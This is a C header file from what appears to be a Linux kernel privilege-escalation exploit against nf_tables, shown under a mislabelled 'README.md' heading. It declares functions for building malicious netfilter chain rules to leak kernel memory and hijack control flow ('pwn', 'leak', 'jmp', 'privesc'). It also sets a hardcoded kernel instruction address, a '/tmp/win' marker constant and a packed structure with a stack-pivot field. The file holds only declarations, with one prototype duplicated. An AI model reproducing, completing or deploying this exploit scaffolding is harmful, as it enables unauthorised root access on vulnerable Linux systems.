README.md
Rendering markdown...
#pragma once
#include <stdint.h>
#include <sys/socket.h>
#define TMP_WINDPROBE 0x6e69772f706d742f
#define INSTR_BASE 0xffffffff81a4fe94
#pragma pack(push,1)
struct jumpstack_t {
unsigned char init;
unsigned long rule;
unsigned long last_rule;
unsigned long expr;
//unsigned long ops;
unsigned long pivot;
unsigned char pad[31];
};
#pragma pack(pop)
int create_base_chain_rule_pwn(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
int create_base_chain_rule_pwn(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
int create_base_chain_rule_leak(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
int create_exploit_chain_rule_leak(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq, uint8_t offset, uint8_t len);
int create_jmp_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
int create_final_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq, uint8_t offset, uint8_t len, unsigned long regs, unsigned long instr);
int pwn(struct mnl_socket* nl, unsigned long regs, unsigned long instr);
int privesc();